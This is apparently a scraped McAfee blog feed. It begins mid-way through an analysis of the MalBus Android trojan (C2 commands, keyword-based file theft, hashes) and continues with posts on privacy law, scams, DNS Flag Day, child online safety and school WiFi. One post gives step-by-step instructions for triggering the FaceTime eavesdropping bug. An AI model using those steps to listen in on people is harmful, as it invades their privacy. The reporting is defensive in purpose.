In addition to the Google phishing page, when “Libfunc” function of the trojan (dropped by the fake plugin or downloaded from the server) is executed, the mobile phone is totally compromised. It receives commands from the following hardcoded list of C2 servers. The main functionality of the trojan is implemented in a function called “doMainProc()”. Please note that there are a few variants of the trojanwith different functionality but, overall, they are pretty much the same.

Figure 12. Hardcoded list of C2 servers

The geolocation of hardcoded C2 servers lookslike the following:

Figure 13. Location of C2 Servers

Inside doMainProc(), the trojan receives commands from the C2 server and calls appropriate handlers. Part of the switch block below gives us an idea of what type of commands this trojan supports.

Figure 14. Subset of command handlers implemented in the dropped trojan.

As you can see, it has all the functionality that a normal trojan has. Downloading, uploading and deleting files on the device, leaking information to a remote server and so on. The following table explains supported C2 commands:

Figure 15. C2 Commands

Before entering the command handling loop, the trojan does some initialization, like sending device information files to the server and checking the UID of the device. Only after the UID checking returns a 1 does it enter the loop.

Figure 16 Servers connected before entering command loop

Among these commands, directory indexing in particular is important. The directory structure is saved in a file named “kakao.property” and while indexing the given path in the user device, it checks the file with specific keywords and if it matches, uploads the file to the remote upload server. These keywords are Korean and its translated English version is as per the following table:

Figure 17 Search file keywords

By looking at the keywords we can anticipate that the malware authors were looking for files related to the military, politics and so on. These files are uploaded to a separate server.

Figure 18 Keyword matching file upload server

Conclusion

Applications can easily trick users into installing them before then leaking sensitive information. Also, it is not uncommon to see malware sneaking onto the official Google Play store, making it hard for users to protect their devices. This malware has not been written for ordinary phishing attempts, but rather very targeted attacks, searching the victim’s devices for files related to the military and politics, likely trying to leak confidential information. Users should always install applications that they can fully trust even though they are downloaded from trusted sources.

McAfee Mobile Security detects this threat as Android/MalBus and alerts mobile users if it is present, while protecting them from any data loss. For more information about McAfee Mobile Security, visit https://www.mcafeemobilesecurity.com.

Hashes (SHA-256)

Initial Downloader (APK)
• 19162b063503105fdc1899f8f653b42d1ff4fcfcdf261f04467fad5f563c0270
• bed3e665d2b5fd53aab19b8a62035a5d9b169817adca8dfb158e3baf71140ceb
• 3252fbcee2d1aff76a9f18b858231adb741d4dc07e803f640dcbbab96db240f9
• e71dc11e8609f6fd84b7af78486b05a6f7a2c75ed49a46026e463e9f86877801

Fake Plugin (APK)
• ecb6603a8cd1354c9be236a3c3e7bf498576ee71f7c5d0a810cb77e1138139ec
• b8b5d82eb25815dd3685630af9e9b0938bccecb3a89ce0ad94324b12d25983f0

Trojan (additional payload)
• b9d9b2e39247744723f72f63888deb191eafa3ffa137a903a474eda5c0c335cf
• 12518eaa24d405debd014863112a3c00a652f3416df27c424310520a8f55b2ec
• 91f8c1f11227ee1d71f096fd97501c17a1361d71b81c3e16bcdabad52bfa5d9f
• 20e6391cf3598a517467cfbc5d327a7bb1248313983cba2b56fd01f8e88bb6b9

The post MalBus: Popular South Korean Bus App Series in Google Play Found Dropping Malware After 5 Years of Development appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/malbus-popular-south-korean-bus-app-series-in-google-play-found-dropping-malware-after-5-years-of-development/feed/ 0
California Consumer Privacy Act https://securingtomorrow.mcafee.com/business/california-consumer-privacy-act/ https://securingtomorrow.mcafee.com/business/california-consumer-privacy-act/#respond Mon, 04 Feb 2019 14:00:17 +0000 https://securingtomorrow.mcafee.com/?p=93964

This blog was written by Gerald Jones Jr. More sweeping privacy law changes are on the horizon as California law overhauls consumer protection and privacy rights. Shortly after the European Union’s watershed General Data Protection Regulation (GDPR) enforcement began on May 25, 2018, California passed its own privacy bill, the California Consumer Privacy Act of […]

The post California Consumer Privacy Act appeared first on McAfee Blogs.

]]>

This blog was written by Gerald Jones Jr.

More sweeping privacy law changes are on the horizon as California law overhauls consumer protection and privacy rights.

Shortly after the European Union’s watershed General Data Protection Regulation (GDPR) enforcement began on May 25, 2018, California passed its own privacy bill, the California Consumer Privacy Act of 2018 (CCPA), in June. Amid pressure to act or swallow a more stringent bill initiated by a private California resident, the CCPA broadens the scope of privacy rights for Californians. It includes data access rights and a limited private right of action, or the right to file a lawsuit.

The CCPA takes effect in January 2020 (or July 2020, if the California Attorney General implements additional regulations) and is widely regarded as the foremost privacy law in the United States. Yet the CCPA may have broader implications. The range of companies falling within the Act’s scope, i.e., not just the usual suspects in the technology industry, might pressure Congress into enacting a federal privacy regime, which would pre-empt the CCPA.

The Act grants consumers greater control over their personally identifiable information and prods companies doing business in the state to prioritize the practice of sound data governance. Here are some key takeaways under the CCPA:

  • It impacts companies doing business in California that meet one of the following thresholds:
    • Has annual gross revenues greater than $25 million; or
    • Receives or shares the personal information of 50,000 or more California consumers for monetary or other valuable consideration; or
    • Receives 50% or more of its annual revenue from selling consumer personal information.
  • “Personal Information now explicitly includes IP addresses, geolocation data, and unique identifiers such as cookies, beacons, pixel tags, browsing history, and another electronic network information. Consumer Information includes information that relates to households.
  • The California Attorney General will enforce the law, though Californians have a private right of action limited to circumstances where there is an unauthorized access to nonencrypted personal information or “disclosure of personal information because of a business failure to implement and maintain reasonable security procedures.”
  • Violators of the law are subject to civil penalties of up $2500 per each unintentional violation—failing to cure a violation within 30 days of receiving noncompliance notification from the California Attorney General—and a maximum of $7,500 for each intentional violation (not acknowledging the request for data, for example) if the civil action is brought by the California Attorney General.

What Does This All Mean?

Regulators are working on guidance, and there is still time for amendments to be made on the law, so things might change before the law goes into effect. Residents of the European Economic Area have been exercising their data subject access rights since late May. Now, Californians will join them in being able to similarly ask about the data that CCPA-applicable companies hold about them. The CCPA gives companies a 45-day window to comply with an individual’s request for access to data or deletion (a Data Subject Access Request, or DSAR) in contrast to the GDPR’s 30 days.

Companies may need to prepare for an increase in DSARs and implement new features to comply with the law, like providing two communication methods for consumers electing to exercise their rights (web portal, email address, toll free telephone number, or another viable mode of communication) and provide a conspicuous link on the company’s website that informs the consumer of her CCPA rights.

The California Legislature’s reference to Cambridge Analytica makes it apparent that legislators expect businesses to exercise transparency in their consumer data use practices. Even without legislative nudging, companies are slowly recognizing value in sound privacy and data governance practices. Companies no longer see privacy as a mere compliance checkbox, but instead as a competitive advantage that simultaneously builds consumer confidence.

We may see more changes to the California law, and we likely will see other laws come in to play both in the United States and abroad (Brazil, China, India, etc.), but companies with privacy in their DNA will have an edge over companies scrambling to meet compliance efforts.

The post California Consumer Privacy Act appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/california-consumer-privacy-act/feed/ 0
Customer Support Scams Are Popping up in Social Media Ads: How to Stay Secure https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/mcafee-customer-support-scam/ https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/mcafee-customer-support-scam/#respond Fri, 01 Feb 2019 14:00:22 +0000 https://securingtomorrow.mcafee.com/?p=93991

Many of us rely on customer support websites for navigating new technology. Whether it’s installing a new piece of software or troubleshooting a computer program, we look to customer support to save the day. Unfortunately, cybercriminals are leveraging our reliance on customer support pages to access our personal information for financial gain. It appears that a […]

The post Customer Support Scams Are Popping up in Social Media Ads: How to Stay Secure appeared first on McAfee Blogs.

]]>

Many of us rely on customer support websites for navigating new technology. Whether it’s installing a new piece of software or troubleshooting a computer program, we look to customer support to save the day. Unfortunately, cybercriminals are leveraging our reliance on customer support pages to access our personal information for financial gain. It appears that a malicious website is attempting to trick users into handing over their McAfee activation keys and personally identifiable information (PII) data by disguising themselves as the official McAfee customer support website.

So how exactly does this cyberthreat work? First, malicious actors advertise the fake website on Twitter. If a user clicks on the ad, they are presented with a “Download McAfee” button. When the user clicks on the download button, they are redirected to a screen prompting them to enter their name, email address, contact number, and product activation key to proceed with the download. However, when the user clicks on the “Start Download” button, they are redirected to a screen stating that their download failed due to an unexpected error.

 

At this point, the site owner has received the user’s personal data, which they could exploit in a variety of ways. And while this scheme may seem tricky to spot, there are a number of ways users can defend themselves from similar scams:

  • Be vigilant when clicking on social media links. Although it may be tempting to click on advertisements on your social media feed, these ads could possibly house sketchy websites developed by cybercriminals. Use caution when interacting with social media ads.
  • Go straight to the source. If you come across an advertisement claiming to be from a company and the link asks for personal data, it’s best to go directly to the company’s website instead. Use the official McAfee customer support page if you require technical support or assistance with your McAfee product.
  • Use security software. A security solution like McAfee WebAdvisor can help you spot suspicious websites and protect you from accidentally clicking on malicious links.

And, as always, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Customer Support Scams Are Popping up in Social Media Ads: How to Stay Secure appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/mcafee-customer-support-scam/feed/ 0
What You Need to Know About DNS Flag Day https://securingtomorrow.mcafee.com/business/what-you-need-to-know-about-dns-flag-day/ Thu, 31 Jan 2019 17:37:02 +0000 https://securingtomorrow.mcafee.com/?p=94009

This blog was written by Michael Schneider, Lead Product Manger. The internet is built on Postel’s law, often referred to as the robustness principle: “Be conservative in what you do, be liberal in what you accept from others.” In the protocol world, this means that receivers will try to accept and interpret data that they receive […]

The post What You Need to Know About DNS Flag Day appeared first on McAfee Blogs.

]]>

This blog was written by Michael Schneider, Lead Product Manger.

The internet is built on Postel’s law, often referred to as the robustness principle: “Be conservative in what you do, be liberal in what you accept from others.” In the protocol world, this means that receivers will try to accept and interpret data that they receive to their best knowledge and will be flexible if the data doesn’t fully match a specification. Senders should adhere to specifications and comply with protocol specifications, as laid out in Request for Comment documents (RFCs) by the Internet Engineering Task Force.

DNS was released as RFC 1035 in 1987 and was superseded by EDNS in 1999 with RFCs 2671 and 6891. EDNS, or extension mechanisms for DNS, aimed to flexibly deploy new features into the DNS protocol, including protection against DNS flooding attacks amongst other performance and security enhancements. These attacks can cause a major outage for cloud-based infrastructure, which happened in 2016 with the DDoS attack on DNS provider Dyn.

To avoid such attacks and improve DNS efficiency, several DNS software and service providers—like Google, Cisco, and Cloudflare—have agreed to “coordinate removing accommodations for non-compliant DNS implementations from their software or service,” beginning Feb. 1, 2019, or DNS Flag Day.

Before DNS Flag Day, if an EDNS server requested a name resolution from a non-EDNS resolver, it would first send an EDNS query. If there was no response, the server would then send a legacy DNS query. That means that the timeout for the first query would need to be reached before the legacy DNS query was sent, generating a delayed response. These delays ultimately make DNS operations less efficient.

But with the new changes introduced for DNS Flag Day, any DNS server that doesn’t respond to EDNS will be seen as “dead” and no additional DNS query will be sent to that server. The result? Certain domains or offerings may no longer be available, as name resolution will fail. Organizations should plan to provide a bridge between their internal DNS and a provider’s DNS to ensure that the EDNS protocol is used. They should also work with their vendors to verify that EDNS is part of DNS communication and obtain a version of the respective product that complied with the requirements of EDNS.

The DNS Flag Day protocols are a disruptive move, as they break from Postel’s law—servers can no longer automatically accept every query. But as with most internet-related innovations, progress requires a little disruption.

The post What You Need to Know About DNS Flag Day appeared first on McAfee Blogs.

]]>
Teach Kids The 4Rs Critical for Online Safety on Safer Internet Day https://securingtomorrow.mcafee.com/consumer/teach-kids-the-4rs-critical-for-online-safety-on-safer-internet-day/ https://securingtomorrow.mcafee.com/consumer/teach-kids-the-4rs-critical-for-online-safety-on-safer-internet-day/#respond Thu, 31 Jan 2019 17:04:30 +0000 https://securingtomorrow.mcafee.com/?p=94006 “What are you doing?” “Uploading pics of our school fest. And don’t peer over my shoulder, Aunty. I have already uploaded a few so check them out on your Instagram account.” I beat a hasty retreat and did as instructed. The photos brought out a smile- such fresh, innocent faces of kids having a good […]

The post Teach Kids The 4Rs Critical for Online Safety on Safer Internet Day appeared first on McAfee Blogs.

]]>
What are you doing?”

Uploading pics of our school fest. And don’t peer over my shoulder, Aunty. I have already uploaded a few so check them out on your Instagram account.”

I beat a hasty retreat and did as instructed. The photos brought out a smile- such fresh, innocent faces of kids having a good time! But that feeling rapidly changed when I read the comments on one particular pic.

Now why are you frowning?” asked the niece.

Perhaps you shouldn’t have shared this one. It’s attracting rude comments. “

Instantly remorseful, the niece took down the picture, but I decided to nevertheless give her a talk on responsible posting.

On the occasion of Safer Internet Day (SID) 2019, let us find out what can make our digital world a happier and safer place, and our digital experience a more positive one.

There are many, like you my dear readers, well aware digital users who endeavor to take measures and ensure that your accounts are secure and devices safe. However, one needs to keep in mind that we are linked online, and therefore the key word is ‘together’. No single entity or product can guarantee 100% safety online, but together we can strive to bring about a better digital experience for all. That’s the theme for 2019 too – ‘Together for a better internet’.

Incidentally, McAfee too has a similar tagline, ‘Together is Power’, underlining the fact that it needs the collaboration of all players- digital users, organizations and vendors- to make cybersecurity effective.

Organizations lay down rules and monitor usage, vendors provide security tools and that leaves us, the users.  What can we do?

‘What can we do as parents?’ Let us start by helping our kids develop four critical skills – the 4Rs of online safety:

  • Respect– I treat myself and others the way I like to be treated
  • Responsibility – I am accountable for my actions and I take a stand when I feel something is wrong
  • Reasoning – I question what is real
  • Resilience – I get back up from tough situations

RESPECT

How do we teach what respect means? We respect those we love or admire. But we also need to learn to respect rules, people’s feelings and take a sympathetic view of differences in physical and emotional aspects of people.  The two values that this calls for are tolerance and empathy.

Here are a few ways you can teach kids respect:

  1. Appreciate when they are tactful and kind
  2. Correct them if they are mean
  3. Make it a family practice to use ‘sorry’, ‘please’, and ‘thank you’ a lot
  4. Role model respectful behavior like being silent in the library, sharing photos with permission, treating boys and girls as equals
  5. Set rules and specify penalties for breaching them

At the same time, help your kids identify undesirable behavior that may show disrespect and abuse.

  1. Being approached by strangers online who ask for photos, personal thoughts
  2. Being a witness to rude, aggressive behavior that causes anguish
  3. Being belittled for beliefs, appearance, race, gender
  4. Being challenged to perform a dare the child isn’t comfortable with

Resilience

Standing up to injustice and aggression as well as springing back to normalcy despite a negative experience is what resilience is about. Let’s accept it, bullies will continue to exist and so it is in the interest of the kids to know how to survive tough situations online. The recipe also calls for dollops of love, support, patience from the family and friends.

Actions that may lead to negative experiences:

  1. Cyberbullying
  2. Risky challenges
  3. Being ignored by peers online
  4. Befriending child groomers
  5. Falling prey to hackers and scammers

You know what to do, right? Teach them cybersafety practices; change account settings and passwords or even delete accounts if necessary; report scam and abuse; rope in teachers to stop bullying in school. Stand by your child. Encourage them to get back on their feet and resume normal life. Help them be tough and face the world- they will thank you for it.

Responsibility

We have often discussed responsible online behavior in these pages, so will not rehash it. Suffice to say that we are the digital space users, content generators and consumers. So, our actions online will ultimately affect us and those in contact with us and their contacts and so on and so forth, covering the entire digital populace. Practice STOP. THINK. CONNECT. SHARE.

Reasoning

We will do the kids a big favour if we can help them to think and act instead of following the herd mentality. Encourage them to question, to reason before accepting any online content to be true. Help them understand the reach and consequences of digital posts and ways to distinguish between a fake news and a real one. Kids have wonderful reasoning power and let us push them to exercise it fully.

What can we do as a community? I think South Korea has set a sterling example:

A civil activist group in South Korea, Sunfull Internet Peace Movement, initiated the “Internet Peace Prize” in 2018 to promote online etiquette and fight cyberbullying. The award went to two people from Japan for their effort to protect human rights by tackling cyberbullying. We can start something similar in our children’s school or our neighbourhood. Schools can set up cyber armies to identify and stop cyberbullying and offer support to victims. The possibilities are many.

Stay safe online everyday; it just calls for a little care. Just like in the real world.

Credits:

Office of the eSafety Commissioner, An Australian Government initiative

 

The post Teach Kids The 4Rs Critical for Online Safety on Safer Internet Day appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/consumer/teach-kids-the-4rs-critical-for-online-safety-on-safer-internet-day/feed/ 0
Apple Users: Here’s What to Do About the Major FaceTime Bug https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/apple-facetime-bug/ https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/apple-facetime-bug/#respond Tue, 29 Jan 2019 19:05:31 +0000 https://securingtomorrow.mcafee.com/?p=93993

FaceTime is a popular way for people of all ages to connect with long-distance loved ones. The feature permits Apple users to video chat with other device owners from essentially anywhere at any time. And now, a bug in the software takes that connection a step further – as it permits users calling via FaceTime […]

The post Apple Users: Here’s What to Do About the Major FaceTime Bug appeared first on McAfee Blogs.

]]>

FaceTime is a popular way for people of all ages to connect with long-distance loved ones. The feature permits Apple users to video chat with other device owners from essentially anywhere at any time. And now, a bug in the software takes that connection a step further – as it permits users calling via FaceTime to hear the audio coming from the recipient’s phone, even before they’ve accepted or denied the call.

Let’s start with how the eavesdropping bug actually works. First, a user would have to start a FaceTime video call with an iPhone contact and while the call is dialing, they must swipe up from the bottom of the screen and tap “Add Person.” Then, they can add their own phone number to the “Add Person” screen. From there, the user can start a group FaceTime call between themselves and the original person dialed, even if that person hasn’t accepted the call. What’s more – if the user presses the volume up or down, the victim’s front-face camera is exposed too.

This bug acts as a reminder that these days your smartphone is just as data rich as your computer. So, as we adopt new technology into our everyday lives, we all must consider how these emerging technology trends could create security risks if we don’t take steps to protect our data.

Therefore, it’s crucial all iOS users that are running iOS 12.1 or later take the right steps now to protect their device and their data. If you’re an Apple user affected by this bug, be sure to follow these helpful security steps:

  • Update, update, update. Speaking of fixes – patches for bugs are included in software updates that come from the provider. Therefore, make sure you always update your device as soon as one is available. Apple has already confirmed that a fix is underway as we speak.
  • Be sure to disable FaceTime in iOS settings now. Until this bug is fixed, it is best to just disable the feature entirely to be sure no one is listening in on you. When a fix does emerge from Apple, you can look into enabling the service again.
  • Apply additional security to your phone. Though the bug will hopefully be patched within the next software update, it doesn’t hurt to always cover your device with an extra layer of security. To protect your phone from any additional mobile threats coming its way, be sure to use a security solution such as McAfee Mobile Security.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Apple Users: Here’s What to Do About the Major FaceTime Bug appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/apple-facetime-bug/feed/ 0
Privacy and Security by Design: Thoughts for Data Privacy Day https://securingtomorrow.mcafee.com/other-blogs/executive-perspectives/privacy-and-security-by-design-thoughts-for-data-privacy-day/ https://securingtomorrow.mcafee.com/other-blogs/executive-perspectives/privacy-and-security-by-design-thoughts-for-data-privacy-day/#respond Mon, 28 Jan 2019 14:00:56 +0000 https://securingtomorrow.mcafee.com/?p=93986

Data Privacy Day has particular relevance this year, as 2018 brought privacy into focus in ways other years have not. Ironically, in the same year that the European Union’s (EU) General Data Protection Regulation (GDPR) came into effect, the public also learned of glaring misuses of personal information and a continued stream of personal data […]

The post Privacy and Security by Design: Thoughts for Data Privacy Day appeared first on McAfee Blogs.

]]>

Data Privacy Day has particular relevance this year, as 2018 brought privacy into focus in ways other years have not. Ironically, in the same year that the European Union’s (EU) General Data Protection Regulation (GDPR) came into effect, the public also learned of glaring misuses of personal information and a continued stream of personal data breaches. Policymakers in the United States know they cannot ignore data privacy, and multiple efforts are underway: bills were introduced in Congress, draft legislation was floated, privacy principles were announced, and a National Institute of Standards and Technology (NIST) Privacy Framework and a National Telecommunications and Information Administration (NTIA) effort to develop the administration’s approach to consumer privacy are in process.

These are all positive steps forward, as revelations about widespread misuse of personal data are causing people to mistrust technology—a situation that must be remedied.

Effective consumer privacy policies and regulations are critical to the continued growth of the U.S. economy, the internet, and the many innovative technologies that rely on consumers’ personal data. Companies need clear privacy and security expectations to not only comply with the diversity of existing laws, but also to grow businesses, improve efficiencies, remain competitive, and most importantly, to encourage consumers to trust organizations and their technology.

If an organization puts the customer at the core of everything it does, as we do at McAfee, then protecting customers’ data is an essential component of doing business. Robust privacy and security solutions are fundamental to McAfee’s strategic vision, products, services, and technology solutions. Likewise, our data protection and security solutions enable our enterprise and government customers to more efficiently and effectively comply with regulatory requirements.

Our approach derives from seeing privacy and security as two sides of the same coin. You can’t have privacy without security. While you can have security without privacy, we strongly believe the two should go hand in hand.

In comments we submitted to NIST on “Developing a Privacy Framework,” we made the case for Privacy and Security by Design. This approach requires companies to consider privacy and security on the drawing board and throughout the development process for products and services going to market. It also means protecting data through a technology design that considers privacy engineering principles. This proactive approach is the most effective way to enable data protection because the data protection strategies are integrated into the technology as the product or service is created. Privacy and Security by Design encourages accountability in the development of technologies, making certain that privacy and security are foundational components of the product and service development processes.

The concept of Privacy and Security by Design is aspirational but is absolutely the best way to achieve privacy and security without end users having to think much about them. We have some recommendations for organizations to consider in designing and enforcing privacy practices.

There are several layers that should be included in the creation of privacy and data security programs:

  • Internal policies should clearly articulate what is permissible and impermissible.
  • Specific departments should specify further granularity regarding policy requirements and best practices (e.g., HR, IT, legal, and marketing will have different requirements and restrictions for the collection, use, and protection of personal data).
  • Privacy (legal and non-legal) and security professionals in the organization must have detailed documentation and process tools that streamline the implementation of the risk-based framework.
  • Ongoing organizational training regarding the importance of protecting personal data and best practices is essential to the continued success of these programs.
  • The policy requirements should be tied to the organization’s code of conduct and enforced as required when polices are violated.

Finally, an organization must have easy-to-understand external privacy and data security policies to educate the user/consumer and to drive toward informed consent to collect and share data wherever possible. The aim must be to make security and privacy ubiquitous, simple, and understood by all.

As we acknowledge Data Privacy Day this year, we hope that privacy will not only be a talking point for policymakers but that it will also result in action. Constructing and agreeing upon U.S. privacy principles through legislation or a framework will be a complicated process. We better start now because we’re already behind many other countries around the globe.

The post Privacy and Security by Design: Thoughts for Data Privacy Day appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/executive-perspectives/privacy-and-security-by-design-thoughts-for-data-privacy-day/feed/ 0
Sharing Isn’t Always Caring: 3 Tips to Help Protect Your Online Privacy https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/data-privacy-day-personal-data/ https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/data-privacy-day-personal-data/#respond Mon, 28 Jan 2019 14:00:25 +0000 https://securingtomorrow.mcafee.com/?p=93934

It’s 2019 and technology is becoming more sophisticated and prevalent than ever. With more technology comes greater connectivity. In fact, by 2020, there will be more than 20 billion internet-connected devices around the world. This equates to more than four devices per person. As we adopt new technology into our everyday lives, it’s important to consider […]

The post Sharing Isn’t Always Caring: 3 Tips to Help Protect Your Online Privacy appeared first on McAfee Blogs.

]]>

It’s 2019 and technology is becoming more sophisticated and prevalent than ever. With more technology comes greater connectivity. In fact, by 2020, there will be more than 20 billion internet-connected devices around the world. This equates to more than four devices per person. As we adopt new technology into our everyday lives, it’s important to consider how this emerging technology could lead to greater privacy risks if we don’t take steps to protect our data. That’s why the National Cyber Security Alliance (NCSA) started Data Privacy Day to help create awareness surrounding the importance of recognizing our digital footprints and safeguarding our data. To further investigate the impact of these footprints, let’s take a look at how we perceive the way data is shared and whose responsibility it is to keep our information safe.

The Impact of Social Media

Most of us interact with multiple social media platforms every day. And while social media is a great way to update your friends and family on your daily life, we often forget that these platforms also allow people we don’t really know to glimpse into our personal lives. For example, 82% of online stalkers use social media to find out information about potential victims, such as where they live or where they go to school. In other words, social media could expose your personal information to users beyond your intended audience.

Certain social media trends also bring up issues of privacy in the world of evolving technology. Take Facebook’s 10-year challenge, a recent viral trend encouraging users to post a side-by-side image of their profile pictures from 2009 and 2019. As WIRED reporter Katie O’Neill points out, the images offered in this trending challenge could potentially be used to train facial recognition software for age progression and age recognition. While the potential of this technology is mostly mundane, there is still a risk that this information could be used inequitably.

How to Approach Requests for Personal Data

Whether we’re using social media or other online resources, we all need to be aware of what personal data we’re offering out and consider the consequences of providing the information. While there are some instances where we can’t avoid sharing our personal data, such as for a government document or legal form, there are other areas where we can stand to be a little more conservative with the data that we divulge. For example, many of us have more than just our close family and friends on our social networks. So, if you’re sharing your location on your latest post, every single person who follows you has access to this information. The same goes for those online personality quizzes. While they may be entertaining, they put an unnecessary amount of your personal information out in the open. This is why it’s crucial to be thoughtful of how your data is collected and stored.

So, what steps can you take to better protect your online privacy? Check out the following tips to help safeguard your data:

  • Think before you post. Before tagging your friends on Instagram, sharing your location on Facebook, or enabling facial recognition, consider what this information reveals and how it could be used by a third-party.
  • Set privacy and security settings. If you don’t want the entire World Wide Web to be able to access your social media, turn your profiles to private. You can also go to your device settings and choose which apps or browsers you want to share your location with and which ones you don’t.
  • Enable two-factor authentication. In the chance your data does become exposed, a strong, unique password can help prevent your accounts from being hacked. Furthermore, you can implement two-factor authentication to stay secure. This will help strengthen your online accounts with a unique, one-time code required to log in and access your data.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Sharing Isn’t Always Caring: 3 Tips to Help Protect Your Online Privacy appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/data-privacy-day-personal-data/feed/ 0
#PrivacyAware: Will You Champion Your Family’s Online Privacy? https://securingtomorrow.mcafee.com/consumer/family-safety/will-you-champion-your-familys-online-privacy/ Sat, 26 Jan 2019 16:00:08 +0000 https://securingtomorrow.mcafee.com/?p=93939

The perky cashier stopped my transaction midway to ask for my email and phone number. Not now. Not ever. No more. I’ve had enough. I thought to myself. “I’d rather not, thank you,” I replied. The cashier finished my transaction and moved on to the next customer without a second thought. And, my email and […]

The post #PrivacyAware: Will You Champion Your Family’s Online Privacy? appeared first on McAfee Blogs.

]]>

online privacyThe perky cashier stopped my transaction midway to ask for my email and phone number.

Not now. Not ever. No more. I’ve had enough. I thought to myself.

“I’d rather not, thank you,” I replied.

The cashier finished my transaction and moved on to the next customer without a second thought.

And, my email and phone number lived in one less place that day.

This seemingly insignificant exchange happened over a year ago, but it represents the day I decided to get serious and champion my (and my family’s) privacy.

I just said no. And I’ve been doing it a lot more ever since.

A few changes I’ve made:

  • Pay attention to privacy policies (especially of banks and health care providers).
  • Read the terms and conditions of apps before downloading.
  • Block cookies from websites.
  • Refuse to purchase from companies that (appear to) take privacy lightly.
  • Max my privacy settings on social networks.
  • Change my passwords regularly and keep them strong!
  • Delete apps I no longer use.
  • Stay on top of software updates on all devices and add extra protection.
  • Have become hyper-aware before giving out my email, address, phone number, or birth date.
  • Limit the number of photos and details shared on social media.

~~~

The amount of personal information we share every day online — and off — is staggering. There’s information we post directly online such as our birth date, our location, our likes, and dislikes. Then there’s the data that’s given off unknowingly via web cookies, Metadata, downloads, and apps.

While some data breaches are out of our control, at the end of the day, we — along with our family members — are one giant data leak.

Studies show that on average by the age of 13, parents have posted 1,300 photos and videos of their child to social media. By the time kids get devices of their own, they are posting to social media 26 times per day on average — a total of nearly 70,000 posts by age 18.

The Risksonline privacy

When we overshare personal data a few things can happen. Digital fallout includes data misuse by companies, identity theft, credit card fraud, medical fraud, home break-ins, reputation damage, location and purchasing tracking, ransomware, and other risks.

The Mind Shift

The first step toward boosting your family’s privacy is to start thinking differently about privacy. Treat your data like gold (after all, that’s the way hackers see it). Guiding your family in this mind-shift will require genuine, consistent effort.

Talk to your family about privacy. Elevate its worth and the consequences when it’s undervalued or shared carelessly.

Teach your kids to treat their personal information — their browsing habits, clicks, address, personal routine, school name, passwords, and connected devices — with great care. Consider implementing this 11 Step Privacy Take Back Plan.

This mind and attitude shift will take time but, hopefully, your kids will learn to pause and think before handing over personal information to an app, a social network, a retail store, or even to friends.

Data Protection Tips*

  1. Share with care. Think before posting about yourself and others online. Consider what it reveals, who might see it and how it could be perceived now and in the future.
  2. Own your online presence. Set the privacy and security settings on websites and apps to your comfort level for information sharing. Each device, application or browser you use will have different features to limit how and with whom you share information.online privacy
  3. Think before you act. Information about you, such as the games you like to play, your contacts list, where you shop and your geographic location, has tremendous value. Be thoughtful about who gets that information and understand how it’s collected through websites and apps.
  4. Lock down your login. Your usernames and passwords are not enough to protect critical accounts like email, banking, and social media. Strengthen online accounts and use strong authentication tools like a unique, one-time code through an app on your mobile device.

* Provided by the National Cyber Security Alliance (NCSA).

January 28 National Data Privacy Day. The day highlights one of the most critical issues facing families today — protecting personal information in a hyper-connected world. It’s a great opportunity to commit to taking real steps to protect your online privacy. For more information on National Data Privacy Day or to get involved, go to Stay Safe Online.

The post #PrivacyAware: Will You Champion Your Family’s Online Privacy? appeared first on McAfee Blogs.

]]>
How Safe is Your Child’s School WiFi? https://securingtomorrow.mcafee.com/consumer/family-safety/how-safe-is-your-childs-school-wifi/ https://securingtomorrow.mcafee.com/consumer/family-safety/how-safe-is-your-childs-school-wifi/#respond Thu, 24 Jan 2019 03:15:43 +0000 https://securingtomorrow.mcafee.com/?p=93950

School WiFi. For many of our digital natives, school WiFi may even be a more important part of their daily life than the canteen!! And that is saying something… You’d be hard pressed to find a child who rocked up to school without a device in their backpack in our digital age. The vast majority […]

The post How Safe is Your Child’s School WiFi? appeared first on McAfee Blogs.

]]>

School WiFi. For many of our digital natives, school WiFi may even be a more important part of their daily life than the canteen!! And that is saying something…

You’d be hard pressed to find a child who rocked up to school without a device in their backpack in our digital age. The vast majority of schools have embraced the many positive learning benefits that internet-connected devices offer our kids. The traditional blackboard and textbook lessons that were confined to the four walls of the classroom are gone. Instead our kids can research, discover, collaborate, create and most importantly, learn like never before.

But in order for this new learning to occur, our kids need to be internet connected. And this is where school WiFi comes into play.

Do Parents Need to Be Concerned About School WiFi?

As parents, we have a responsibility to ensure our kids are safe and not at risk – and that includes when they are using the WiFi at school. Ideally, your child’s school should have a secure WiFi network but unfortunately, that doesn’t mean that they do. School budgets are tight and top-notch secure WiFi networks are expensive, so in some cases, security maybe jeopardised.

The other factor we shouldn’t ignore is that our batch of digital natives are very tech literate. The possibility that one of them may choose to cause some mayhem to their school WiFi network should also not be ignored!!

At the end of the day, the security of a WiFi network is all about whether it has tight access controls. If it allows only approved devices and people to connect via a secure login then it is more secure than public WiFi. However, if it is open to anyone or easy for anyone to connect to it, then you need to treat it like public WiFi.

What Are the Risks?

An unsecured school WiFi network is as risky as public WiFi which, according to the Harvard Business Review, is as risky as rolling a dice,

Students and staff who use an unsecured WiFi network are at risk of receiving phishing emails, being the victim of a ransomware attack or even having their data or personal details stolen. There is also a risk that the entire school’s operations could be disrupted and possibly even closed down through a DDOS – a Denial of Service Attack.

What Can Parents Do to Ensure Their Kids Are Safe Using School WiFi?

There are several steps parents can take to minimise the risks when their offspring use school WiFi.

